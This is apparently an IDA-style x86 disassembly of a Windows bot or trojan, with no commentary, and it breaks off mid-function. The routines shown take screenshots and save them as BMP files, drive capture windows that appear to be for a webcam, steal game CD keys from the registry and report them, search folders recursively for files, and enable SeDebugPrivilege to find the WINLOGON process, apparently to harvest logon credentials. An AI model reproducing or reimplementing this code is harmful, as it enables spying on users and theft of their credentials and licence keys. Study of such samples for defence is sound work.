push esi
push edi
push [ebp+var_C]
push [ebp+var_8]
push esi
push esi
push [ebp+var_4]
call ds:dword_43ADE0 ;; BitBlt
test eax, eax
jz loc_4087D7
cmp ebx, esi
jz short loc_4086D4
lea eax, [ebp+var_484]
push eax
push ebx
push esi
push [ebp+var_4]
call ds:dword_43ACC8 ;; GetDIBColorTable
mov ebx, eax
loc_4086D4: ; CODE XREF: sub_4085B3+10B�j
mov edi, [ebp+var_10]
mov ecx, [ebp+var_8]
imul edi, [ebp+var_C]
imul edi, ecx
mov eax, ebx
push esi
shr edi, 3
shl eax, 2
mov [ebp+var_8], eax
push 80h
lea edx, [eax+edi+36h]
add eax, 36h
push 2
mov [ebp+var_26], eax
mov eax, [ebp+var_C]
push esi
push esi
push 40000000h
push [ebp+arg_0]
mov [ebp+var_50], eax
mov ax, word ptr [ebp+var_10]
mov [ebp+var_30], 4D42h
mov [ebp+var_2E], edx
mov [ebp+var_2A], si
mov [ebp+var_28], si
mov [ebp+var_58], 28h
mov [ebp+var_54], ecx
mov [ebp+var_4C], 1
mov [ebp+var_4A], ax
mov [ebp+var_48], esi
mov [ebp+var_44], esi
mov [ebp+var_40], esi
mov [ebp+var_3C], esi
mov [ebp+var_38], ebx
mov [ebp+var_34], esi
call ds:off_424084
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_4087B7
lea ecx, [ebp+var_14]
push esi
push ecx
lea ecx, [ebp+var_30]
push 0Eh
push ecx
push eax
call ds:dword_42407C ;; WriteFile
lea eax, [ebp+var_14]
push esi
push eax
lea eax, [ebp+var_58]
push 28h
push eax
push [ebp+arg_0]
call ds:dword_42407C ;; WriteFile
cmp ebx, esi
jz short loc_408799
lea eax, [ebp+var_14]
push esi
push eax
lea eax, [ebp+var_484]
push [ebp+var_8]
push eax
push [ebp+arg_0]
call ds:dword_42407C ;; WriteFile
loc_408799: ; CODE XREF: sub_4085B3+1CC�j
lea eax, [ebp+var_14]
push esi
push eax
push edi
push [ebp+var_18]
push [ebp+arg_0]
call ds:dword_42407C ;; WriteFile
push [ebp+arg_0]
call ds:off_424078
push 1
pop esi
loc_4087B7: ; CODE XREF: sub_4085B3+1A2�j
push [ebp+var_1C]
call ds:dword_43ACFC ;; DeleteObject
push [ebp+var_4]
call ds:dword_43AC60 ;; DeleteDC
mov edi, [ebp+var_20]
loc_4087CC: ; CODE XREF: sub_4085B3+70�j
push edi
call ds:dword_43AC60 ;; DeleteDC
mov eax, esi
jmp short loc_4087E9
; ---------------------------------------------------------------------------
loc_4087D7: ; CODE XREF: sub_4085B3+C7�j
; sub_4085B3+D9�j ...
push edi
call ds:dword_43AC60 ;; DeleteDC
push [ebp+var_4]
call ds:dword_43AC60 ;; DeleteDC
loc_4087E7: ; CODE XREF: sub_4085B3+23�j
xor eax, eax
loc_4087E9: ; CODE XREF: sub_4085B3+222�j
pop edi
pop esi
pop ebx
leave
retn
sub_4085B3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4087EE proc near ; CODE XREF: sub_40EE72+46EB�p
var_34 = byte ptr -34h
var_20 = dword ptr -20h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 34h
push ebx
push esi
push edi
push 1
pop esi
xor ebx, ebx
push esi
push ds:dword_439830
push 78h
push 0A0h
push ebx
push ebx
push 40000000h
push offset aWindow ; "Window"
call ds:dword_43ACF0
mov edi, eax
cmp edi, ebx
mov [ebp+var_4], edi
jnz short loc_40882C
mov eax, esi
jmp loc_4089E2
; ---------------------------------------------------------------------------
loc_40882C: ; CODE XREF: sub_4087EE+35�j
push edi
call ds:dword_43AD38 ;; IsWindow
test eax, eax
jz short loc_408849
push ebx
push [ebp+arg_4]
push 40Ah
push edi
call ds:dword_43ADF4 ;; SendMessageA
jmp short loc_40884B
; ---------------------------------------------------------------------------
loc_408849: ; CODE XREF: sub_4087EE+47�j
xor eax, eax
loc_40884B: ; CODE XREF: sub_4087EE+59�j
cmp eax, ebx
jnz short loc_408856
loc_40884F: ; CODE XREF: sub_4087EE+88�j
; sub_4087EE+BC�j
mov ebx, esi
jmp loc_4089D7
; ---------------------------------------------------------------------------
loc_408856: ; CODE XREF: sub_4087EE+5F�j
push edi
call ds:dword_43AD38 ;; IsWindow
test eax, eax
jz short loc_408873
lea eax, [ebp+var_34]
push eax
push 2Ch
push 40Eh
push edi
call ds:dword_43ADF4 ;; SendMessageA
loc_408873: ; CODE XREF: sub_4087EE+71�j
cmp [ebp+var_20], ebx
jz short loc_40884F
push edi
call ds:dword_43AD38 ;; IsWindow
test eax, eax
mov edi, 42Ch
jz short loc_408899
push ebx
push ebx
push edi
push [ebp+var_4]
call ds:dword_43ADF4 ;; SendMessageA
mov [ebp+arg_4], eax
jmp short loc_40889C
; ---------------------------------------------------------------------------
loc_408899: ; CODE XREF: sub_4087EE+98�j
mov [ebp+arg_4], ebx
loc_40889C: ; CODE XREF: sub_4087EE+A9�j
push [ebp+arg_4]
call sub_417B89
cmp eax, ebx
pop ecx
mov [ebp+var_8], eax
jz short loc_40884F
push [ebp+arg_4]
call sub_417B89
mov esi, eax
pop ecx
cmp esi, ebx
jnz short loc_4088C3
push 1
pop ebx
jmp loc_4089D7
; ---------------------------------------------------------------------------
loc_4088C3: ; CODE XREF: sub_4087EE+CB�j
push [ebp+var_4]
call ds:dword_43AD38 ;; IsWindow
test eax, eax
jz short loc_4088E0
push [ebp+var_8]
push [ebp+arg_4]
push edi
push [ebp+var_4]
call ds:dword_43ADF4 ;; SendMessageA
loc_4088E0: ; CODE XREF: sub_4087EE+E0�j
push [ebp+arg_4]
push [ebp+var_8]
push esi
call sub_417390
mov ecx, [ebp+arg_8]
add esp, 0Ch
cmp ecx, ebx
jg short loc_4088FB
mov ecx, 280h
loc_4088FB: ; CODE XREF: sub_4087EE+106�j
mov eax, [ebp+arg_C]
cmp eax, ebx
jg short loc_408907
mov eax, 1E0h
loc_408907: ; CODE XREF: sub_4087EE+112�j
push [ebp+var_4]
mov [esi+4], ecx
mov [esi+8], eax
mov word ptr [esi+0Eh], 10h
mov [esi+14h], ebx
mov [esi+10h], ebx
mov [esi+20h], ebx
mov [esi+24h], ebx
mov word ptr [esi+0Ch], 1
mov [esi+28h], bl
mov [esi+29h], bl
mov [esi+2Ah], bl
mov [esi+2Bh], bl
call ds:dword_43AD38 ;; IsWindow
test eax, eax
mov edi, 42Dh
jz short loc_408951
push esi
push [ebp+arg_4]
push edi
push [ebp+var_4]
call ds:dword_43ADF4 ;; SendMessageA
loc_408951: ; CODE XREF: sub_4087EE+153�j
push [ebp+var_4]
call ds:dword_43AD38 ;; IsWindow
test eax, eax
jz short loc_40896E
push ebx
push ebx
push 43Dh
push [ebp+var_4]
call ds:dword_43ADF4 ;; SendMessageA
loc_40896E: ; CODE XREF: sub_4087EE+16E�j
push [ebp+var_4]
call ds:dword_43AD38 ;; IsWindow
test eax, eax
jz short loc_40898D
push [ebp+arg_0]
push ebx
push 419h
push [ebp+var_4]
call ds:dword_43ADF4 ;; SendMessageA
loc_40898D: ; CODE XREF: sub_4087EE+18B�j
push [ebp+var_4]
call ds:dword_43AD38 ;; IsWindow
test eax, eax
jz short loc_4089AA
push [ebp+var_8]
push [ebp+arg_4]
push edi
push [ebp+var_4]
call ds:dword_43ADF4 ;; SendMessageA
loc_4089AA: ; CODE XREF: sub_4087EE+1AA�j
push [ebp+var_8]
call sub_417C3B
push esi
call sub_417C3B
pop ecx
pop ecx
push [ebp+var_4]
call ds:dword_43AD38 ;; IsWindow
test eax, eax
jz short loc_4089D7
push ebx
push ebx
push 40Bh
push [ebp+var_4]
call ds:dword_43ADF4 ;; SendMessageA
loc_4089D7: ; CODE XREF: sub_4087EE+63�j
; sub_4087EE+D0�j ...
push [ebp+var_4]
call ds:dword_43AE48 ;; DestroyWindow
mov eax, ebx
loc_4089E2: ; CODE XREF: sub_4087EE+39�j
pop edi
pop esi
pop ebx
leave
retn
sub_4087EE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4089E7 proc near ; CODE XREF: sub_40EE72+47A4�p
var_90 = byte ptr -90h
var_7C = dword ptr -7Ch
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 90h
push ebx
push esi
push edi
push 1
pop esi
xor ebx, ebx
push esi
push ds:dword_439830
push 78h
push 0A0h
push ebx
push ebx
push 40000000h
push offset aWindow ; "Window"
call ds:dword_43ACF0
mov edi, eax
cmp edi, ebx
jnz short loc_408A25
mov eax, esi
jmp loc_408C21
; ---------------------------------------------------------------------------
loc_408A25: ; CODE XREF: sub_4089E7+35�j
push edi
call ds:dword_43AD38 ;; IsWindow
test eax, eax
jz short loc_408A42
push ebx
push [ebp+arg_4]
push 40Ah
push edi
call ds:dword_43ADF4 ;; SendMessageA
jmp short loc_408A44
; ---------------------------------------------------------------------------
loc_408A42: ; CODE XREF: sub_4089E7+47�j
xor eax, eax
loc_408A44: ; CODE XREF: sub_4089E7+59�j
cmp eax, ebx
jnz short loc_408A4F
loc_408A48: ; CODE XREF: sub_4089E7+8B�j
; sub_4089E7+BC�j
mov ebx, esi
jmp loc_408C18
; ---------------------------------------------------------------------------
loc_408A4F: ; CODE XREF: sub_4089E7+5F�j
push edi
call ds:dword_43AD38 ;; IsWindow
test eax, eax
jz short loc_408A6F
lea eax, [ebp+var_90]
push eax
push 2Ch
push 40Eh
push edi
call ds:dword_43ADF4 ;; SendMessageA
loc_408A6F: ; CODE XREF: sub_4089E7+71�j
cmp [ebp+var_7C], ebx
jz short loc_408A48
push edi
call ds:dword_43AD38 ;; IsWindow
test eax, eax
jz short loc_408A92
push ebx
push ebx
push 42Ch
push edi
call ds:dword_43ADF4 ;; SendMessageA
mov [ebp+arg_4], eax
jmp short loc_408A95
; ---------------------------------------------------------------------------
loc_408A92: ; CODE XREF: sub_4089E7+96�j
mov [ebp+arg_4], ebx
loc_408A95: ; CODE XREF: sub_4089E7+A9�j
push [ebp+arg_4]
call sub_417B89
cmp eax, ebx
pop ecx
mov [ebp+var_4], eax
jz short loc_408A48
push [ebp+arg_4]
call sub_417B89
mov esi, eax
pop ecx
cmp esi, ebx
jnz short loc_408ABC
push 1
pop ebx
jmp loc_408C18
; ---------------------------------------------------------------------------
loc_408ABC: ; CODE XREF: sub_4089E7+CB�j
push edi
call ds:dword_43AD38 ;; IsWindow
test eax, eax
jz short loc_408AD9
push [ebp+var_4]
push [ebp+arg_4]
push 42Ch
push edi
call ds:dword_43ADF4 ;; SendMessageA
loc_408AD9: ; CODE XREF: sub_4089E7+DE�j
push [ebp+arg_4]
push [ebp+var_4]
push esi
call sub_417390
mov ecx, [ebp+arg_C]
add esp, 0Ch
cmp ecx, ebx
jg short loc_408AF4
mov ecx, 0A0h
loc_408AF4: ; CODE XREF: sub_4089E7+106�j
mov eax, [ebp+arg_10]
cmp eax, ebx
jg short loc_408AFE
push 78h
pop eax
loc_408AFE: ; CODE XREF: sub_4089E7+112�j
push edi
mov [esi+4], ecx
mov [esi+8], eax
mov word ptr [esi+0Eh], 10h
mov [esi+14h], ebx
mov [esi+10h], ebx
mov [esi+20h], ebx
mov [esi+24h], ebx
mov word ptr [esi+0Ch], 1
mov [esi+28h], bl
mov [esi+29h], bl
mov [esi+2Ah], bl
mov [esi+2Bh], bl
call ds:dword_43AD38 ;; IsWindow
test eax, eax
jz short loc_408B43
push esi
push [ebp+arg_4]
push 42Dh
push edi
call ds:dword_43ADF4 ;; SendMessageA
loc_408B43: ; CODE XREF: sub_4089E7+14A�j
push edi
call ds:dword_43AD38 ;; IsWindow
test eax, eax
jz short loc_408B60
lea eax, [ebp+var_64]
push eax
push 60h
push 441h
push edi
call ds:dword_43ADF4 ;; SendMessageA
loc_408B60: ; CODE XREF: sub_4089E7+165�j
push edi
mov [ebp+var_60], ebx
mov [ebp+var_3C], ebx
mov [ebp+var_38], ebx
mov [ebp+var_34], ebx
mov [ebp+var_30], 1
mov [ebp+var_2C], 5
mov [ebp+var_64], 1046Ah
call ds:dword_43AD38 ;; IsWindow
test eax, eax
jz short loc_408B9E
lea eax, [ebp+var_64]
push eax
push 60h
push 440h
push edi
call ds:dword_43ADF4 ;; SendMessageA
loc_408B9E: ; CODE XREF: sub_4089E7+1A3�j
push edi
call ds:dword_43AD38 ;; IsWindow
test eax, eax
jz short loc_408BB9
push [ebp+arg_0]
push ebx
push 414h
push edi
call ds:dword_43ADF4 ;; SendMessageA
loc_408BB9: ; CODE XREF: sub_4089E7+1C0�j
push edi
call ds:dword_43AD38 ;; IsWindow
test eax, eax
jz short loc_408BD2
push ebx
push ebx
push 43Eh
push edi
call ds:dword_43ADF4 ;; SendMessageA
loc_408BD2: ; CODE XREF: sub_4089E7+1DB�j
push edi
call ds:dword_43AD38 ;; IsWindow
test eax, eax
jz short loc_408BEF
push [ebp+var_4]
push [ebp+arg_4]
push 42Dh
push edi
call ds:dword_43ADF4 ;; SendMessageA
loc_408BEF: ; CODE XREF: sub_4089E7+1F4�j
push [ebp+var_4]
call sub_417C3B
push esi
call sub_417C3B
pop ecx
pop ecx
push edi
call ds:dword_43AD38 ;; IsWindow
test eax, eax
jz short loc_408C18
push ebx
push ebx
push 40Bh
push edi
call ds:dword_43ADF4 ;; SendMessageA
loc_408C18: ; CODE XREF: sub_4089E7+63�j
; sub_4089E7+D0�j ...
push edi
call ds:dword_43AE48 ;; DestroyWindow
mov eax, ebx
loc_408C21: ; CODE XREF: sub_4089E7+39�j
pop edi
pop esi
pop ebx
leave
retn
sub_4089E7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408C26 proc near ; CODE XREF: sub_40EE72+588B�p
var_3F4 = byte ptr -3F4h
var_2F0 = byte ptr -2F0h
var_F0 = byte ptr -0F0h
var_70 = byte ptr -70h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 3F4h
push ebx
xor ebx, ebx
cmp ds:off_42B894, ebx
mov [ebp+var_C], 80h
jz loc_408DC7
push esi
push edi
mov eax, offset off_42B894
mov esi, offset dword_42B8A0
mov edi, offset aSCdKeyS_ ; "%s CD Key: (%s)."
loc_408C56: ; CODE XREF: sub_408C26+199�j
lea ecx, [ebp+var_4]
push ecx
push 20019h
push ebx
push dword ptr [eax]
push dword ptr [esi-10h]
call ds:dword_43AE08 ;; RegOpenKeyExA
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_F0]
push eax
push ebx
push ebx
push dword ptr [esi-8]
push [ebp+var_4]
call ds:dword_43ACA4 ;; RegQueryValueExA
test eax, eax
jnz loc_408DAD
mov eax, [esi]
cmp eax, ebx
jz loc_408D71
push eax
lea eax, [ebp+var_F0]
push eax
lea eax, [ebp+var_3F4]
push offset aSS_3 ; "%s\\%s"
push eax
call sub_4172B0
lea eax, [ebp+var_3F4]
push offset aR ; "r"
push eax
call sub_4179A8
add esp, 18h
cmp eax, ebx
mov [ebp+var_8], eax
jz loc_408DAD
push eax
loc_408CCF: ; CODE XREF: sub_408C26+D4�j
lea eax, [ebp+var_70]
push 64h
push eax
call sub_41900C
add esp, 0Ch
test eax, eax
jz loc_408D66
push dword ptr [esi+4]
lea eax, [ebp+var_70]
push eax
call sub_417880
pop ecx
test eax, eax
pop ecx
jz short loc_408CFC
push [ebp+var_8]
jmp short loc_408CCF
; ---------------------------------------------------------------------------
loc_408CFC: ; CODE XREF: sub_408C26+CF�j
push 3Dh
push dword ptr [esi+4]
call sub_418F50
pop ecx
test eax, eax
pop ecx
jz short loc_408D2A
lea eax, [ebp+var_70]
push offset asc_42CA98 ; "="
push eax
call sub_418B6E
push offset asc_42CA98 ; "="
push ebx
call sub_418B6E
add esp, 10h
jmp short loc_408D2D
; ---------------------------------------------------------------------------
loc_408D2A: ; CODE XREF: sub_408C26+E4�j
lea eax, [ebp+var_70]
loc_408D2D: ; CODE XREF: sub_408C26+102�j
push eax
lea eax, [ebp+var_2F0]
push dword ptr [esi-4]
push edi
push eax
call sub_4172B0
add esp, 10h
lea eax, [ebp+var_2F0]
push ebx
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
lea eax, [ebp+var_2F0]
push eax
call sub_40BF6D
add esp, 18h
loc_408D66: ; CODE XREF: sub_408C26+B9�j
push [ebp+var_8]
call sub_417900
pop ecx
jmp short loc_408DAD
; ---------------------------------------------------------------------------
loc_408D71: ; CODE XREF: sub_408C26+6A�j
lea eax, [ebp+var_F0]
push eax
lea eax, [ebp+var_2F0]
push dword ptr [esi-4]
push edi
push eax
call sub_4172B0
push ebx
lea eax, [ebp+var_2F0]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
lea eax, [ebp+var_2F0]
push eax
call sub_40BF6D
add esp, 28h
loc_408DAD: ; CODE XREF: sub_408C26+60�j
; sub_408C26+A2�j ...
push [ebp+var_4]
call ds:dword_43AD74 ;; RegCloseKey
add esi, 18h
cmp [esi-0Ch], ebx
lea eax, [esi-0Ch]
jnz loc_408C56
pop edi
pop esi
loc_408DC7: ; CODE XREF: sub_408C26+19�j
pop ebx
leave
retn
sub_408C26 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408DCA proc near ; DATA XREF: sub_40EE72+3D60�o
var_49C = byte ptr -49Ch
var_29C = dword ptr -29Ch
var_298 = byte ptr -298h
var_218 = byte ptr -218h
var_115 = byte ptr -115h
var_114 = byte ptr -114h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 49Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov ecx, 0A7h
mov esi, eax
lea edi, [ebp+var_29C]
rep movsd
mov dword ptr [eax+298h], 1
lea eax, [ebp+var_114]
push eax
call sub_417AB0
xor ebx, ebx
cmp [ebp+eax+var_115], 5Ch
pop ecx
jnz short loc_408E1F
lea eax, [ebp+var_114]
push eax
call sub_417AB0
pop ecx
mov [ebp+eax+var_115], bl
loc_408E1F: ; CODE XREF: sub_408DCA+3F�j
lea eax, [ebp+var_218]
push eax
push offset unk_42CAEC
lea eax, [ebp+var_49C]
push 200h
push eax
call sub_41782A
add esp, 10h
cmp [ebp+var_8], ebx
jnz short loc_408E64
push ebx
lea eax, [ebp+var_49C]
push [ebp+var_C]
push eax
lea eax, [ebp+var_298]
push eax
push [ebp+var_29C]
call sub_40D679
add esp, 14h
loc_408E64: ; CODE XREF: sub_408DCA+78�j
lea eax, [ebp+var_114]
push ebx
push eax
lea eax, [ebp+var_218]
push eax
lea eax, [ebp+var_298]
push [ebp+var_C]
push eax
push [ebp+var_29C]
call sub_408EE5
add esp, 18h
push eax
lea eax, [ebp+var_49C]
push offset unk_42CABC
push eax
call sub_4172B0
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz short loc_408EC5
push ebx
lea eax, [ebp+var_49C]
push [ebp+var_C]
push eax
lea eax, [ebp+var_298]
push eax
push [ebp+var_29C]
call sub_40D679
add esp, 14h
loc_408EC5: ; CODE XREF: sub_408DCA+D9�j
lea eax, [ebp+var_49C]
push eax
call sub_40BF6D
push [ebp+var_10]
call sub_417078
pop ecx
pop ecx
push ebx
call ds:dword_424054 ;; ExitThread
pop edi
pop esi
pop ebx
sub_408DCA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408EE5 proc near ; CODE XREF: sub_408DCA+B9�p
; sub_408EE5+9E�p
var_54C = byte ptr -54Ch
var_34C = byte ptr -34Ch
var_248 = byte ptr -248h
var_144 = byte ptr -144h
var_118 = byte ptr -118h
var_117 = byte ptr -117h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 54Ch
push ebx
push esi
push edi
mov esi, 104h
push [ebp+arg_10]
lea eax, [ebp+var_248]
push offset aS_5 ; "%s\\*"
push esi
push eax
call sub_41782A
mov edi, ds:off_4240BC
add esp, 10h
lea eax, [ebp+var_144]
push eax
lea eax, [ebp+var_248]
push eax
call edi ; sub_4DF334
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
mov ebx, offset aSS_3 ; "%s\\%s"
jz short loc_408FA2
loc_408F31: ; CODE XREF: sub_408EE5+BB�j
test [ebp+var_144], 10h
jz short loc_408F8E
cmp [ebp+var_118], 2Eh
jnz short loc_408F55
cmp [ebp+var_117], 0
jz short loc_408F8E
cmp [ebp+var_117], 2Eh
jz short loc_408F8E
loc_408F55: ; CODE XREF: sub_408EE5+5C�j
lea eax, [ebp+var_118]
push eax
lea eax, [ebp+var_34C]
push [ebp+arg_10]
push ebx
push esi
push eax
call sub_41782A
push [ebp+arg_14]
lea eax, [ebp+var_34C]
push eax
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_408EE5
add esp, 2Ch
mov [ebp+arg_14], eax
loc_408F8E: ; CODE XREF: sub_408EE5+53�j
; sub_408EE5+65�j ...
lea eax, [ebp+var_144]
push eax
push [ebp+var_4]
call ds:off_4240B8
test eax, eax
jnz short loc_408F31
loc_408FA2: ; CODE XREF: sub_408EE5+4A�j
push [ebp+var_4]
call ds:off_4240AC
push [ebp+arg_C]
lea eax, [ebp+var_248]
push [ebp+arg_10]
push ebx
push esi
push eax
call sub_41782A
add esp, 14h
lea eax, [ebp+var_144]
push eax
lea eax, [ebp+var_248]
push eax
call edi ; sub_4DF334
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_409028
loc_408FD9: ; CODE XREF: sub_408EE5+141�j
lea eax, [ebp+var_118]
inc [ebp+arg_14]
push eax
lea eax, [ebp+var_54C]
push [ebp+arg_10]
push offset aFoundSS ; " Found: %s\\%s"
push 200h
push eax
call sub_41782A
push 1
lea eax, [ebp+var_54C]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
add esp, 28h
lea eax, [ebp+var_144]
push eax
push esi
call ds:off_4240B8
test eax, eax
jnz short loc_408FD9
loc_409028: ; CODE XREF: sub_408EE5+F2�j
push esi
call ds:off_4240AC
mov eax, [ebp+arg_14]
pop edi
pop esi
pop ebx
leave
retn
sub_408EE5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409037 proc near ; DATA XREF: sub_40EE72+5237�o
var_29C = byte ptr -29Ch
var_9C = dword ptr -9Ch
var_98 = byte ptr -98h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 29Ch
mov eax, [ebp+arg_0]
push esi
push edi
push 25h
pop ecx
mov esi, eax
lea edi, [ebp+var_9C]
push 1
rep movsd
pop esi
mov [eax+90h], esi
call sub_40B78A
cmp eax, esi
mov [ebp+var_4], eax
jz short loc_409076
cmp eax, 2
jz short loc_409076
push offset unk_42CD60
jmp loc_4091B5
; ---------------------------------------------------------------------------
loc_409076: ; CODE XREF: sub_409037+2E�j
; sub_409037+33�j
push esi
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_41511F
pop ecx
test eax, eax
pop ecx
jz loc_4091B0
push ebx
push offset aNtdll_dll ; "NTDLL.DLL"
call ds:off_4240E0
mov esi, ds:off_4240DC
mov edi, eax
push offset aNtquerysystemi ; "NtQuerySystemInformation"
push edi
mov [ebp+var_8], edi
call esi ; sub_4E0076
push offset aRtlcreatequery ; "RtlCreateQueryDebugBuffer"
push edi
mov ds:dword_43AA44, eax
call esi ; sub_4E0076
push offset aRtlqueryproces ; "RtlQueryProcessDebugInformation"
push edi
mov ds:dword_43AA38, eax
call esi ; sub_4E0076
push offset aRtldestroyquer ; "RtlDestroyQueryDebugBuffer"
push edi
mov ds:dword_43AC48, eax
call esi ; sub_4E0076
push offset aRtlrundecodeun ; "RtlRunDecodeUnicodeString"
push edi
mov ds:dword_43AA40, eax
call esi ; sub_4E0076
mov ds:dword_43AA3C, eax
call sub_409209
test eax, eax
mov [ebp+arg_0], eax
jz loc_409183
mov esi, ds:dword_4240D8
mov edi, 400h
mov ebx, offset dword_439A38
push edi
push ebx
push offset aUsername ; "USERNAME"
call esi ; GetEnvironmentVariableW
push edi
mov edi, offset dword_43A238
push edi
push offset aUserdomain ; "USERDOMAIN"
call esi ; GetEnvironmentVariableW
cmp [ebp+var_4], 1
push offset dword_43AC50
push [ebp+arg_0]
jnz short loc_40912F
call sub_409392
jmp short loc_409134
; ---------------------------------------------------------------------------
loc_40912F: ; CODE XREF: sub_409037+EF�j
call sub_409539
loc_409134: ; CODE XREF: sub_409037+F6�j
pop ecx
test eax, eax
pop ecx
jz short loc_40917C
cmp ds:dword_43AC50, 0
jnz short loc_409163
push ebx
push edi
push [ebp+arg_0]
lea eax, [ebp+var_29C]
push offset unk_42CC0C
push 200h
push eax
call sub_41782A
add esp, 18h
jmp short loc_409196
; ---------------------------------------------------------------------------
loc_409163: ; CODE XREF: sub_409037+10A�j
cmp [ebp+var_4], 1
push [ebp+arg_0]
jnz short loc_409173
call sub_40966F
jmp short loc_409178
; ---------------------------------------------------------------------------
loc_409173: ; CODE XREF: sub_409037+133�j
call sub_409706
loc_409178: ; CODE XREF: sub_409037+13A�j
pop ecx
push eax
jmp short loc_409188
; ---------------------------------------------------------------------------
loc_40917C: ; CODE XREF: sub_409037+101�j
push offset unk_42CBC4
jmp short loc_409188
; ---------------------------------------------------------------------------
loc_409183: ; CODE XREF: sub_409037+B6�j
push offset unk_42CB80
loc_409188: ; CODE XREF: sub_409037+143�j
; sub_409037+14A�j
lea eax, [ebp+var_29C]
push eax
call sub_4172B0
pop ecx
pop ecx
loc_409196: ; CODE XREF: sub_409037+12A�j
push 0
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_41511F
pop ecx
pop ecx
push [ebp+var_8]
call ds:off_4240D4
pop ebx
jmp short loc_4091C3
; ---------------------------------------------------------------------------
loc_4091B0: ; CODE XREF: sub_409037+4E�j
push offset unk_42CB3C
loc_4091B5: ; CODE XREF: sub_409037+3A�j
lea eax, [ebp+var_29C]
push eax
call sub_4172B0
pop ecx
pop ecx
loc_4091C3: ; CODE XREF: sub_409037+177�j
xor esi, esi
cmp [ebp+var_10], esi
jnz short loc_4091EA
push esi
lea eax, [ebp+var_29C]
push [ebp+var_14]
push eax
lea eax, [ebp+var_98]
push eax
push [ebp+var_9C]
call sub_40D679
add esp, 14h
loc_4091EA: ; CODE XREF: sub_409037+191�j
lea eax, [ebp+var_29C]
push eax
call sub_40BF6D
push [ebp+var_18]
call sub_417078
pop ecx
pop ecx
push esi
call ds:dword_424054 ;; ExitThread
pop edi
pop esi
sub_409037 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_409209 proc near ; CODE XREF: sub_409037+AC�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
sub esp, 18h
and [esp+18h+var_4], 0
and [esp+18h+var_14], 0
push ebx
push ebp
push esi
mov esi, ds:dword_4240EC
mov ebx, 100h
push edi
push ebx
push 8
call esi ; GetProcessHeap
mov edi, ds:dword_4240E8
push eax
call edi ; RtlAllocateHeap
mov ebp, eax
lea eax, [esp+28h+var_14]
push eax
push ebx
push ebp
push 10h
call ds:dword_43AA44
push ebp
push 0
call esi ; GetProcessHeap
push eax
call ds:dword_4240E4 ;; RtlFreeHeap
push [esp+28h+var_14]
push 8
call esi ; GetProcessHeap
push eax
call edi ; RtlAllocateHeap
mov ebp, eax
mov eax, [esp+28h+var_14]
lea ecx, [esp+28h+var_C]
mov [esp+28h+var_C], eax
push ecx
push eax
push ebp
push 10h
call ds:dword_43AA44
test eax, eax
jnz short loc_4092F6
mov eax, [esp+28h+var_C]
shr eax, 4
mov [esp+28h+var_10], eax
jz short loc_4092F6
push 1
mov ebx, ebp
pop ecx
cmp eax, ecx
mov [esp+28h+var_18], ecx
jb short loc_4092F6
loc_409292: ; CODE XREF: sub_409209+EB�j
cmp word ptr [ebx+8], 5
jnz short loc_4092E9
push 0
push 0
call ds:dword_43AA38
mov edi, eax
push edi
push 1
push dword ptr [ebx+4]
call ds:dword_43AC48
test eax, eax
jnz short loc_4092DA
mov eax, [edi+60h]
push offset aWinlogon ; "WINLOGON"
mov [esp+2Ch+var_8], eax
lea eax, [edi+80h]
push eax
call sub_419063
pop ecx
push eax
call sub_417880
pop ecx
test eax, eax
pop ecx
jnz short loc_40930E
loc_4092DA: ; CODE XREF: sub_409209+AA�j
test edi, edi
jz short loc_4092E5
push edi
call ds:dword_43AA40
loc_4092E5: ; CODE XREF: sub_409209+D3�j
mov eax, [esp+28h+var_10]
loc_4092E9: ; CODE XREF: sub_409209+8E�j
add ebx, 10h
inc [esp+28h+var_18]
cmp [esp+28h+var_18], eax
jbe short loc_409292
loc_4092F6: ; CODE XREF: sub_409209+6D�j
